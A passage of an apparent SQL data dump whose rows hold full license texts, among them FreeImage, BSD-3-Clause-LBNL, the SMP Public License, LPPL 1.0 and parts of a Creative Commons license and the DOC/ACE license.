THIS\nLICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Collections from You under this License, however, will not\nhave their licenses terminated provided such individuals or entities remain\nin full compliance with those licenses. Sections 1, 2, 5, 6, 7, and 8 will\nsurvive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You Distribute or Publicly Perform the Work or a Collection,\nthe Licensor offers to the recipient a license to the Work on the same terms\nand conditions as the license granted to You under this License.\n\nb. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nc. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\nd. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\ne. The rights granted under, and the subject matter referenced, in this License\nwere drafted utilizing the terminology of the Berne Convention for the Protection\nof Literary and Artistic Works (as amended on September 28, 1979), the Rome\nConvention of 1961, the WIPO Copyright Treaty of 1996, the WIPO Performances\nand Phonograms Treaty of 1996 and the Universal Copyright Convention (as revised\non July 24, 1971). These rights and subject matter take effect in the relevant\njurisdiction in which the License terms are sought to be enforced according\nto the corresponding provisions of the implementation of those treaty provisions\nin the applicable national law. If the standard suite of rights granted under\napplicable copyright law includes additional rights not granted under this\nLicense, such additional rights are deemed to be included in the License;\nthis License is not intended to restrict the license of any rights under applicable\nlaw.\n\nCreative Commons Notice\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, Creative Commons does not authorize the use by either\nparty of the trademark \"Creative Commons\" or any related trademark or logo\nof Creative Commons without the prior written consent of Creative Commons.\nAny permitted use will be in compliance with Creative Commons\' then-current\ntrademark usage guidelines, as may be published on its website or otherwise\nmade available upon request from time to time. For the avoidance of doubt,\nthis trademark restriction does not form part of this License.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(349,'BSD-3-Clause-LBNL','Copyright (c) 2003, The Regents of the University of California, through Lawrence\nBerkeley National Laboratory (subject to receipt of any required approvals\nfrom the U.S. Dept. of Energy). All rights reserved. Redistribution and use\nin source and binary forms, with or without modification, are permitted provided\nthat the following conditions are met:\n\n(1) Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n(2) Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n(3) Neither the name of the University of California, Lawrence Berkeley National\nLaboratory, U.S. Dept. of Energy nor the names of its contributors may be\nused to endorse or promote products derived from this software without specific\nprior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n\nLIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\nOUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\nDAMAGE.\n\nYou are under no obligation whatsoever to provide any bug fixes, patches,\nor upgrades to the features, functionality or performance of the source code\n(\"Enhancements\") to anyone; however, if you choose to make your Enhancements\navailable either publicly, or directly to Lawrence Berkeley National Laboratory,\nwithout imposing a separate written license agreement for such Enhancements,\nthen you hereby grant the following license: a non-exclusive, royalty-free\nperpetual license to install, use, modify, prepare derivative works, incorporate\ninto other computer software, distribute, and sublicense such Enhancements\nor derivative works thereof, in binary and source code form.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(350,'FreeImage','FreeImage Public License - Version 1.0\n\n 1. Definitions.\n\n1.1. \"Contributor\" means each entity that creates or contributes to the creation\nof Modifications.\n\n1.2. \"Contributor Version\" means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. \"Covered Code\" means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.4. \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.5. \"Executable\" means Covered Code in any form other than Source Code.\n\n1.6. \"Initial Developer\" means the individual or entity identified as the\nInitial Developer in the Source Code notice required by Exhibit A.\n\n1.7. \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n 1.8. \"License\" means this document.\n\n1.9. \"Modifications\" means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a\n\n Modification is:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.10. \"Original Code\" means Source Code of computer software code which is\ndescribed in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.11. \"Source Code\" means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or a list of source code differential comparisons against\neither the Original Code or another well known, available Covered Code of\nthe Contributor\'s choice. The Source Code can be in a compressed or archival\nform, provided the appropriate decompression or de-archiving software is widely\navailable for no charge.\n\n1.12. \"You\" means an individual or a legal entity exercising rights under,\nand complying with all of the terms of, this License or a future version of\nthis License issued under Section 6.1. For legal entities, \"You\" includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\" means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of fifty percent (50%) or more\nof the outstanding shares or beneficial ownership of such entity.\n\n 2. Source Code License.\n\n 2.1. The Initial Developer Grant.\n\nThe Initial Developer hereby grants You a world-wide, royalty-free, non-exclusive\nlicense, subject to third party intellectual property claims:\n\n(a) to use, reproduce, modify, display, perform, sublicense and distribute\nthe Original Code (or portions thereof) with or without Modifications, or\nas part of a Larger Work; and\n\n(b) under patents now or hereafter owned or controlled by Initial Developer,\nto make, have made, use and sell (\"Utilize\") the Original Code (or portions\nthereof), but solely to the extent that any such patent is reasonably necessary\nto enable You to Utilize the Original Code (or portions thereof) and not to\nany greater extent that may be necessary to Utilize further Modifications\nor combinations.\n\n 2.2. Contributor Grant.\n\nEach Contributor hereby grants You a world-wide, royalty-free, non-exclusive\nlicense, subject to third party intellectual property claims:\n\n(a) to use, reproduce, modify, display, perform, sublicense and distribute\nthe Modifications created by such Contributor (or portions thereof) either\non an unmodified basis, with other Modifications, as Covered Code or as part\nof a Larger Work; and\n\n(b) under patents now or hereafter owned or controlled by Contributor, to\nUtilize the Contributor Version (or portions thereof), but solely to the extent\nthat any such patent is reasonably necessary to enable You to Utilize the\nContributor Version (or portions thereof), and not to any greater extent that\nmay be necessary to Utilize further Modifications or combinations.\n\n 3. Distribution Obligations.\n\n 3.1. Application of License.\n\nThe Modifications which You create or to which You contribute are governed\nby the terms of this License, including without limitation Section 2.2. The\nSource Code version of Covered Code may be distributed only under the terms\nof this License or a future version of this License released under Section\n6.1, and You must include a copy of this License with every copy of the Source\nCode You distribute. You may not offer or impose any terms on any Source Code\nversion that alters or restricts the applicable version of this License or\nthe recipients\' rights hereunder. However, You may include an additional document\noffering the additional rights described in Section 3.5.\n\n 3.2. Availability of Source Code.\n\nAny Modification which You create or to which You contribute must be made\navailable in Source Code form under the terms of this License either on the\nsame media as an Executable version or via an accepted Electronic Distribution\nMechanism to anyone to whom you made an Executable version available; and\nif made available via Electronic Distribution Mechanism, must remain available\nfor at least twelve (12) months after the date it initially became available,\nor at least six (6) months after a subsequent version of that particular Modification\nhas been made available to such recipients. You are responsible for ensuring\nthat the Source Code version remains available even if the Electronic Distribution\nMechanism is maintained by a third party.\n\n 3.3. Description of Modifications.\n\nYou must cause all Covered Code to which you contribute to contain a file\ndocumenting the changes You made to create that Covered Code and the date\nof any change. You must include a prominent statement that the Modification\nis derived, directly or indirectly, from Original Code provided by the Initial\nDeveloper and including the name of the Initial Developer in (a) the Source\nCode, and (b) in any notice in an Executable version or related documentation\nin which You describe the origin or ownership of the Covered Code.\n\n 3.4. Intellectual Property Matters\n\n (a) Third Party Claims.\n\nIf You have knowledge that a party claims an intellectual property right in\nparticular functionality or code (or its utilization under this License),\nyou must include a text file with the source code distribution titled \"LEGAL\"\nwhich describes the claim and the party making the claim in sufficient detail\nthat a recipient will know whom to contact. If you obtain such knowledge after\nYou make Your Modification available as described in Section 3.2, You shall\npromptly modify the LEGAL file in all copies You make available thereafter\nand shall take other steps (such as notifying appropriate mailing lists or\nnewsgroups) reasonably calculated to inform those who received the Covered\nCode that new knowledge has been obtained.\n\n (b) Contributor APIs.\n\nIf Your Modification is an application programming interface and You own or\ncontrol patents which are reasonably necessary to implement that API, you\nmust also include this information in the LEGAL file.\n\n 3.5. Required Notices.\n\nYou must duplicate the notice in Exhibit A in each file of the Source Code,\nand this License in any documentation for the Source Code, where You describe\nrecipients\' rights relating to Covered Code. If You created one or more Modification(s),\nYou may add your name as a Contributor to the notice described in Exhibit\nA. If it is not possible to put such notice in a particular Source Code file\ndue to its structure, then you must include such notice in a location (such\nas a relevant directory file) where a user would be likely to look for such\na notice. You may choose to offer, and to charge a fee for, warranty, support,\nindemnity or liability obligations to one or more recipients of Covered Code.\nHowever, You may do so only on Your own behalf, and not on behalf of the Initial\nDeveloper or any Contributor. You must make it absolutely clear than any such\nwarranty, support, indemnity or liability obligation is offered by You alone,\nand You hereby agree to indemnify the Initial Developer and every Contributor\nfor any liability incurred by the Initial Developer or such Contributor as\na result of warranty, support, indemnity or liability terms You offer.\n\n 3.6. Distribution of Executable Versions.\n\nYou may distribute Covered Code in Executable form only if the requirements\nof Section 3.1-3.5 have been met for that Covered Code, and if You include\na notice stating that the Source Code version of the Covered Code is available\nunder the terms of this License, including a description of how and where\nYou have fulfilled the obligations of Section 3.2. The notice must be conspicuously\nincluded in any notice in an Executable version, related documentation or\ncollateral in which You descr ibe recipients\' rights relating to the Covered\nCode. You may distribute the Executable version of Covered Code under a license\nof Your choice, which may contain terms different from this License, provided\nthat You are in compliance with the terms of this License and that the license\nfor the Executable version does not attempt to limit or alter the recipient\'s\nrights in the Source Code version from the rights set forth in this License.\nIf You distribute the Executable version under a different license You must\nmake it absolutely clear that any terms which differ from this License are\noffered by You alone, not by the Initial Developer or any Contributor. You\nhereby agree to indemnify the Initial Developer and every Contributor for\nany liability incurred by the Initial Developer or such Contributor as a result\nof any such terms You offer.\n\n 3.7. Larger Works.\n\nYou may create a Larger Work by combining Covered Code with other code not\ngoverned by the terms of this License and distribute the Larger Work as a\nsingle product. In such a case, You must make sure the requirements of this\nLicense are fulfilled for the Covered Code.\n\n 4. Inability to Comply Due to Statute or Regulation.\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Code due to statute or regulation\nthen You must: (a) comply with the terms of this License to the maximum extent\npossible; and (b) describe the limitations and the code they affect. Such\ndescription must be included in the LEGAL file described in Section 3.4 and\nmust be included with all distributions of the Source Code. Except to the\nextent prohibited by statute or regulation, such description must be sufficiently\ndetailed for a recipient of ordinary skill to be able to understand it.\n\n 5. Application of this License.\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A, and to related Covered Code.\n\n 6. Versions of the License.\n\n 6.1. New Versions.\n\nFloris van den Berg may publish revised and/or new versions of the License\nfrom time to time. Each version will be given a distinguishing version number.\n\n 6.2. Effect of New Versions.\n\nOnce Covered Code has been published under a particular version of the License,\nYou may always continue to use it under the terms of that version. You may\nalso choose to use such Covered Code under the terms of any subsequent version\nof the License published by Floris van den Berg\n\nNo one other than Floris van den Berg has the right to modify the terms applicable\nto Covered Code created under this License.\n\n 6.3. Derivative Works.\n\nIf you create or use a modified version of this License (which you may only\ndo in order to apply it to code which is not already Covered Code governed\nby this License), you must (a) rename Your license so that the phrases \"FreeImage\",\n`FreeImage Public License\", \"FIPL\", or any confusingly similar phrase do not\nappear anywhere in your license and (b) otherwise make it clear that your\nversion of the license contains terms which differ from the FreeImage Public\nLicense. (Filling in the name of the Initial Developer, Original Code or Contributor\nin the notice described in Exhibit A shall not of themselves be deemed to\nbe modifications of this License.)\n\n 7. DISCLAIMER OF WARRANTY.\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES\nTHAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR\nPURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN\nANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME\nTHE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8. TERMINATION.\n\nThis License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n 9. LIMITATION OF LIABILITY.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL THE INITIAL DEVELOPER, ANY OTHER\nCONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE, OR ANY SUPPLIER OF ANY OF\nSUCH PARTIES, BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL,\nINCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION,\nDAMAGES FOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION,\nOR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL\nHAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF\nLIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING\nFROM SUCH PARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THAT EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 10. U.S. GOVERNMENT END USERS.\n\nThe Covered Code is a \"commercial item,\" as that term is defined in 48 C.F.R.\n2.101 (Oct. 1995), consisting of \"commercial computer software\" and \"commercial\ncomputer software documentation,\" as such terms are used in 48 C.F.R. 12.212\n(Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through\n227.7202-4 (June 1995), all U.S. Government End Users acquire Covered Code\nwith only those rights set forth herein.\n\n 11. MISCELLANEOUS.\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by Dutch law provisions (except to the extent applicable\nlaw, if any, provides otherwise), excluding its conflict-of-law provisions.\nWith respect to disputes in which at least one party is a citizen of, or an\nentity chartered or registered to do business in, the The Netherlands: (a)\nunless otherwise agreed in writing, all disputes relating to this License\n(excepting any dispute relating to intellectual property rights) shall be\nsubject to final and binding arbitration, with the losing party paying all\ncosts of arbitration; (b) any arbitration relating to this Agreement shall\nbe held in Almelo, The Netherlands; and (c) any litigation relating to this\nAgreement shall be subject to the jurisdiction of the court of Almelo, The\nNetherlands with the losing party responsible for costs, including without\nlimitation, court costs and reasonable attorneys fees and expenses. Any law\nor regulation which provides that the language of a contract shall be construed\nagainst the drafter shall not apply to this License.\n\n 12. RESPONSIBILITY FOR CLAIMS.\n\nExcept in cases where another Contributor has failed to comply with Section\n3.4, You are responsible for damages arising, directly or indirectly, out\nof Your utilization of rights under this License, based on the number of copies\nof Covered Code you made available, the revenues you received from utilizing\nsuch rights, and other relevant factors. You agree to work with affected parties\nto distribute responsibility on an equitable basis. EXHIBIT A.\n\n\"The contents of this file are subject to the FreeImage Public License Version\n1.0 (the \"License\"); you may not use this file except in compliance with the\nLicense. You may obtain a copy of the License at http://home.wxs.nl/~flvdberg/freeimage-license.txt\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(351,'SMPPL','Secure Messaging Protocol (SMP) Libraries [ACL, CML, SFL]\n\nDistribution Rights\n\nAll source code for the SMP is being provided at no cost and with no financial\nlimitations regarding its use and distribution. Organizations can use the\nSMP without paying any royalties or licensing fees. The SMP was originally\ndeveloped by the U.S. Government. BAE Systems is enhancing and supporting\nthe SMP under contract to the U.S. Government. The U.S. Government is furnishing\nthe SMP software at no cost to the vendor subject to the conditions of the\nSMP Public License provided with the SMP software.\n\n29 May 2002\n\nSecure Messaging Protocol (SMP) Public License\n\nThe United States Government/Department of Defense/National Security Agency/Office\nof Network Security (collectively \"the U.S. Government\") hereby grants permission\nto any person obtaining a copy of the SMP source and object files (the \"SMP\nSoftware\") and associated documentation files (the \"SMP Documentation\"), or\nany portions thereof, to do the following, subject to the following license\nconditions:\n\nYou may, free of charge and without additional permission from the U.S. Government,\nuse, copy, modify, sublicense and otherwise distribute the SMP Software or\ncomponents of the SMP Software, with or without modifications developed by\nyou and/or by others.\n\nYou may, free of charge and without additional permission from the U.S. Government,\ndistribute copies of the SMP Documentation, with or without modifications\ndeveloped by you and/or by others, at no charge or at a charge that covers\nthe cost of reproducing such copies, provided that this SMP Public License\nis retained.\n\nFurthermore, if you distribute the SMP Software or parts of the SMP Software,\nwith or without modifications developed by you and/or others, then you must\neither make available the source code to all portions of the SMP Software\n(exclusive of any modifications made by you and/or by others) upon request,\nor instead you may notify anyone requesting the SMP Software source code that\nit is freely available from the U.S. Government.\n\nTransmission of this SMP Public License must accompany whatever portions of\nthe SMP Software you redistribute.\n\nThe SMP Software is provided without warranty or guarantee of any nature,\nexpress or implied, including without limitation the warranties of merchantability\nand fitness for a particular purpose.\n\nThe U.S. Government cannot be held liable for any damages either directly\nor indirectly caused by the use of the SMP Software.\n\nIt is not permitted to copy, sublicense, distribute or transfer any of the\nSMP Software except as expressly indicated herein. Any attempts to do otherwise\nwill be considered a violation of this License and your rights to the SMP\nSoftware will be voided.\n\nThe SMP uses the Enhanced SNACC (eSNACC) Abstract Syntax Notation One (ASN.1)\nC++ Library to ASN.1 encode and decode security-related data objects. The\neSNACC ASN.1 C++ Library is covered by the ENHANCED SNACC SOFTWARE PUBLIC\nLICENSE. None of the GNU public licenses apply to the eSNACC ASN.1 C++ Library.\nThe eSNACC Compiler is not distributed as part of the SMP.\n\nCopyright © 1997-2002 National Security Agency\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(352,'LPPL-1.0','LaTeX Project Public License\n\nLPPL Version 1.0 1999-03-01\n\nCopyright 1999 LaTeX3 Project\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but modification is not allowed.\n\nPreamble\n\nThe LaTeX Project Public License (LPPL) is the license under which the base\nLaTeX distribution is distributed. As described below you may use this licence\nfor any software that you wish to distribute.\n\nIt may be particularly suitable if your software is TeX related (such as a\nLaTeX package file) but it may be used for any software, even if it is unrelated\nto TeX.\n\nTo use this license, the files of your distribution should have an explicit\ncopyright notice giving your name and the year, together with a reference\nto this license.\n\nA typical example would be\n\n%% pig.sty\n\n%% Copyright 2001 M. Y. Name\n\n% This program can redistributed and/or modified under the terms\n\n% of the LaTeX Project Public License Distributed from CTAN\n\n% archives in directory macros/latex/base/lppl.txt; either\n\n% version 1 of the License, or (at your option) any later version.\n\nGiven such a notice in the file, the conditions of this document would apply,\nwith:\n\n`The Program\' referring to the software `pig.sty\' and `The Copyright Holder\'\nreferring to the person `M. Y. Name\'.\n\nTo see a real example, see the file legal.txt which carries the copyright\nnotice for the base latex distribution.\n\nThis license gives terms under which files of The Program may be distributed\nand modified. Individual files may have specific further constraints on modification,\nbut no file should have restrictions on distribution other than those specified\nbelow.\n\nThis is to ensure that a distributor wishing to distribute a complete unmodified\ncopy of The Program need only check the conditions in this file, and does\nnot need to check every file in The Program for extra restrictions. If you\ndo need to modify the distribution terms of some files, do not refer to this\nlicense, instead distribute The Program under a different license. You may\nuse the parts of the text of LPPL as a model for your own license, but your\nlicense should not directly refer to the LPPL or otherwise give the impression\nthat The Program is distributed under the LPPL.\n\nThe LaTeX Project Public License\n\n================================\n\nTerms And Conditions For Copying, Distribution And Modification\n\n===============================================================\n\nWARRANTY\n\n========\n\nThere is no warranty for The Program, to the extent permitted by applicable\nlaw. Except when otherwise stated in writing, The Copyright Holder provides\nThe Program `as is\' without warranty of any kind, either expressed or implied,\nincluding, but not limited to, the implied warranties of merchantability and\nfitness for a particular purpose. The entire risk as to the quality and performance\nof the program is with you. Should The Program prove defective, you assume\nthe cost of all necessary servicing, repair or correction.\n\nIn no event unless required by applicable law or agreed to in writing will\nThe Copyright Holder, or any of the individual authors named in the source\nfor The Program, be liable to you for damages, including any general, special,\nincidental or consequential damages arising out of any use of The Program\nor out of inability to use The Program (including but not limited to loss\nof data or data being rendered inaccurate or losses sustained by you or by\nthird parties as a result of a failure of The Program to operate with any\nother programs), even if such holder or other party has been advised of the\npossibility of such damages.\n\nDISTRIBUTION\n\n============\n\nRedistribution of unchanged files is allowed provided that all files that\nmake up the distribution of The Program are distributed. In particular this\nmeans that The Program has to be distributed including its documentation if\ndocumentation was part of the original distribution.\n\nThe distribution of The Program will contain a prominent file listing all\nthe files covered by this license.\n\nIf you receive only some of these files from someone, complain!\n\nThe distribution of changed versions of certain files included in the The\nProgram, and the reuse of code from The Program, are allowed under the following\nrestrictions:\n\n* It is allowed only if the legal notice in the file does not expressly forbid\nit. See note below, under \"Conditions on individual files\".\n\n* You rename the file before you make any changes to it, unless the file explicitly\nsays that renaming is not required. Any such changed files must be distributed\nunder a license that forbids distribution of those files, and any files derived\nfrom them, under the names used by the original files in the distribution\nof The Program.\n\n* You change any `identification string\' in The Program to clearly indicate\nthat the file is not part of the standard system.\n\n* If The Program includes an `error report address\' so that errors may be\nreported to The Copyright Holder, or other specified addresses, this address\nmust be changed in any modified versions of The Program, so that reports for\nfiles not maintained by the original program maintainers are directed to the\nmaintainers of the changed files.\n\n* You acknowledge the source and authorship of the original version in the\nmodified file.\n\n* You also distribute the unmodified version of the file or alternatively\nprovide sufficient information so that the user of your modified file can\nbe reasonably expected to be able to obtain an original, unmodified copy of\nThe Program. For example, you may specify a URL to a site that you expect\nwill freely provide the user with a copy of The Program (either the version\non which your modification is based, or perhaps a later version).\n\n* If The Program is intended to be used with, or is based on, LaTeX, then\nfiles with the following file extensions which have special meaning in LaTeX\nSoftware, have special modification rules under the license:\n\n- Files with extension `.ins\' (installation files): these files may not be\nmodified at all because they contain the legal notices that are placed in\nthe generated files.\n\n- Files with extension `.fd\' (LaTeX font definitions files): these files are\nallowed to be modified without changing the name, but only to enable use of\nall available fonts and to prevent attempts to access unavailable fonts. However,\nmodified files are not allowed to be distributed in place of original files.\n\n- Files with extension `.cfg\' (configuration files): these files can be created\nor modified to enable easy configuration of the system. The documentation\nin cfgguide.tex in the base LaTeX distribution describes when it makes sense\nto modify or generate such files.\n\nThe above restrictions are not intended to prohibit, and hence do not apply\nto, the updating, by any method, of a file so that it becomes identical to\nthe latest version of that file in The Program.\n\n========================================================================\n\nNOTES\n\n=====\n\nWe believe that these requirements give you the freedom you to make modifications\nthat conform with whatever technical specifications you wish, whilst maintaining\nthe availability, integrity and reliability of The Program. If you do not\nsee how to achieve your goal whilst adhering to these requirements then read\nthe document cfgguide.tex in the base LaTeX distribution for suggestions.\n\nBecause of the portability and exchangeability aspects of systems like LaTeX,\nThe LaTeX3 Project deprecates the distribution of non-standard versions of\ncomponents of LaTeX or of generally available contributed code for them but\nsuch distributions are permitted under the above restrictions.\n\nThe document modguide.tex in the base LaTeX distribution details the reasons\nfor the legal requirements detailed above. Even if The Program is unrelated\nto LaTeX, the argument in modguide.tex may still apply, and should be read\nbefore a modified version of The Program is distributed.\n\nConditions on individual files\n\n==============================\n\nThe individual files may bear additional conditions which supersede the general\nconditions on distribution and modification contained in this file. If there\nare any such files, the distribution of The Program will contain a prominent\nfile that lists all the exceptional files.\n\nTypical examples of files with more restrictive modification conditions would\nbe files that contain the text of copyright notices.\n\n* The conditions on individual files differ only in the extent of *modification*\nthat is allowed.\n\n* The conditions on *distribution* are the same for all the files. Thus a\n(re)distributor of a complete, unchanged copy of The Program need meet only\nthe conditions in this file; it is not necessary to check the header of every\nfile in the distribution to check that a distribution meets these requirements.\n','2020-08-04 08:07:03','2020-08-04 08:07:03',0),(353,'DOC','Copyright and Licensing Information for ACE(TM), TAO(TM), CIAO(TM), DAnCE(TM),\nand CoSMIC(TM)\n\nACE(TM), TAO(TM), CIAO(TM), DAnCE>(TM), and CoSMIC(TM) (henceforth referred\nto as \"DOC software\") are copyrighted by Douglas C. Schmidt and his research\ngroup at Washington University, University of California, Irvine, and Vanderbilt\nUniversity, Copyright (c) 1993-2009, all rights reserved. Since DOC software\nis open-source, freely available software, you are free to use, modify, copy,\nand distribute--perpetually and irrevocably--the DOC software source code\nand object code produced from the source, as well as copy and distribute modified\nversions of this software. You must, however, include this copyright statement\nalong with any code built using DOC software that you release. No copyright\nstatement needs to be provided if you just ship binary executables of your\nsoftware products.\n\nYou can use DOC software in commercial and/or binary software releases and\nare under no obligation to redistribute any of your source code that is built\nusing DOC software. Note, however, that you may not misappropriate the DOC\nsoftware code, such as copyrighting it yourself or claiming authorship of\nthe DOC software code, in a way that will prevent DOC software from being\ndistributed freely using an open-source development model. You needn\'t inform\nanyone that you\'re using DOC software in your software, though we encourage\nyou to let us know so we can promote your project in the DOC software success\nstories.\n\nThe ACE, TAO, CIAO, DAnCE, and CoSMIC web sites are maintained by the DOC\nGroup at the Institute for Software Integrated Systems (ISIS) and the Center\nfor Distributed Object Computing of Washington University, St. Louis for the\ndevelopment of open-source software as part of the open-source software community.\nSubmissions are provided by the submitter ``as is\'\' with no warranties whatsoever,\nincluding any warranty of merchantability, noninfringement of third party\nintellectual property, or fitness for any particular purpose. In no event\nshall the submitter be liable for any direct, indirect, special, exemplary,\npunitive, or consequential damages, including without limitation, lost profits,\neven if advised of the possibility of such damages. Likewise, DOC software\nis provided as is with no warranties of any kind, including the warranties\nof design, merchantability, and fitness for a particular purpose, noninfringement,\nor arising from a course of dealing, usage or trade practice. Washington University,\nUC Irvine, Vanderbilt University, their employees, and students shall have\nno liability with respect to the infringement of copyrights, trade secrets\nor any patents by DOC software or any part thereof. Moreover, in no event\nwill Washington University, UC Irvine, or Vanderbilt University, their employees,\nor students be liable for any lost revenue or profits or other special, indirect\nand consequential damages.\n\nDOC software is provided with no support and without any obligation on the\npart of Washington University, UC Irvine, Vanderbilt University, their employees,\nor students to assist in its use, correction, modification, or enhancement.\nA number of companies around the world provide commercial support for DOC\nsoftware, however. DOC software is Y2K-compliant, as long as the underlying\nOS platform is Y2K-compliant. Likewise, DOC software is compliant with the\nnew US daylight savings rule passed by Congress as \"The Energy Policy Act\nof 2005,\" which established new daylight savings times (DST) rules for the\nUnited States that expand DST as of March 2007. Since DOC software obtains\ntime/date and calendaring information from operating systems users will not\nbe affected by the new DST rules as long as they upgrade their operating systems\naccordingly.\n\nThe names ACE(TM), TAO(TM), CIAO(TM), DAnCE(TM), 